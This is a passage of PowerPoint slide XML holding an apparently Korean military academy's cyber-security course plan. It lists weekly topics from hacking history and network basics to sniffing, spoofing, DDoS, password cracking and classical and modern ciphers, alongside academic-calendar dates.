      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1676341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t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>목  차</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1730680524"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4451847" y="2813240"/>
          <a:ext cx="3288306" cy="1970659"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="791154">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2798934004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2497152">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Intro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서론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Plan</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강의안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5237968"/>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Environ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도구</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454905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Theory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Training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8" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Appendix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부록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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="그룹 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79C5BF1A-DB7F-4A21-804B-E89012BFF09C}"/>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065F188-5BDE-42EE-ACAD-4B7ED0FEE8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A1972FD-AD4A-4E19-9877-85FE136750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890BFED-5A77-48BA-BC1E-2E58B9A6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9368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 name="표 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74F5DDF1-1DD2-4B55-A58A-301CFAC1474C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1136159570"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="662998" y="259852"/>
          <a:ext cx="5196782" cy="6407649"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="731460">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3849756039"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1913277">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3643059982"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1913277">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1189105761"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="638768">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2328329478"/>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2179210497"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="415791">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이론</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정보보안의 정의와 사이버전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7141443"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="415791">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실습체계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OT(</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사이버전 실습체계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7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6890124"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="42572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2</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 사례</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해킹의 역사</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75</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="700" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>기 졸업</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="700" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="700" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>임관식</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(3.12.(</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6089501"/>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정보의표현</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디지털 데이터</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비트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바이트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이진수</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>, 16</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>진수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아스키 코드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확장자</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파일헤더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828482"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="4260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3</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사례</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주요 사이버 공격 및 사이버전 사례</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스턱스넷</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에스토니아</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>, 7.7DoS </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>등</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>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020693"/>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운영체제</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운영체제</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운영체제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시스템 권한</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9710538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4</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 수행능력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각 나라별 사이버전 수행조직 및 능력</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우리나라 사이버전 수행조직 및 능력</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802303"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="671624">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150" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="0" spc="-150" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>사이버 보안 기본</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="0" spc="-15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보안실무</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네트워크 보안 설정</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침해대응</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578377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5</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기본 개념</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OSI </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>참조 모델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2084924"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="4613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실습 </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구조 데모</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핑</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경로 추적</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분석 도구</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>Tshark</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>, Wireshark)</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31996796"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="278037">
                <a:tc rowSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="ctr" fontAlgn="base" latinLnBrk="0">
                        <a:lnSpc>
                          <a:spcPct val="110000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="0" spc="-80">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>6</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TCP/IP </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>프로토콜</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6161286"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="27803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기본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48950687"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="39827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7</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기술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위협 단계별 분석</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기술 발전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7243461"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="3982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심화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편집 도구</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>(vi) </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>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2526012"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>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10" name="표 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DDA8A94-7E03-4DCC-A59E-60323ED89FEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1312219396"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5974509" y="259853"/>
          <a:ext cx="5826967" cy="6407648"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="856368">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2079907277"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2098793">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1884598264"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2098793">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3374536937"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="773013">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2076545781"/>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589692198"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="340414">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8</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[4. 19.(</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23.(</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800" b="1" kern="0" spc="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6119462"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="42165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9</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네트워크위협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스니핑</a:t>
                      </a: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스푸핑</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홍보출장</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="700" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>(1</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="700" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>차</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="700" kern="0" spc="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dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>(4.29(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="700" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>목</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="700" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>)~30(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="700" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>금</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="700" kern="0" spc="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1411112"/>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스니핑</a:t>
                      </a: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스푸핑</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t> 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APR, IP Spoofing</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73273933"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="365870">
                <a:tc rowSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="ctr" fontAlgn="base" latinLnBrk="0">
                        <a:lnSpc>
                          <a:spcPct val="10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네트워크위협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서비스 거부</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>(DDoS) </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>공격</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t> </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어린이날</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="700" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>(5.5(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="700" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>수</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700" kern="0" spc="-100">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>옥포제</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="700" kern="0" spc="-100">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>(5.6(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="700" kern="0" spc="-100">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>목</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="700" kern="0" spc="-100">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>)~7(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="700" kern="0" spc="-100">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>금</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="700" kern="0" spc="-10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0607172"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="50795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DDOS </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="800" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>SYN Flooding, Slowloris </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>공격</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32816879"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="43285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시스템위협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획득</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60" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>석가탄신일</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="700" kern="0" spc="-60" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>(5.19(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="700" kern="0" spc="-60" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>수</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="700" kern="0" spc="-6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9168473"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="432852">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공격</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크래킹</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주요 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28124569"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="374536">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바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>사이버방어기술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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>암호</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="바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치환 및 전치 암호</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대칭키</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t> 및 비대칭키 암호</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4487891"/>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시저</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비즈네르</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>rsa</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블록암호</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>(CBC &amp; ECB) </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>모드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03627477"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="4854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 방어 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90">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
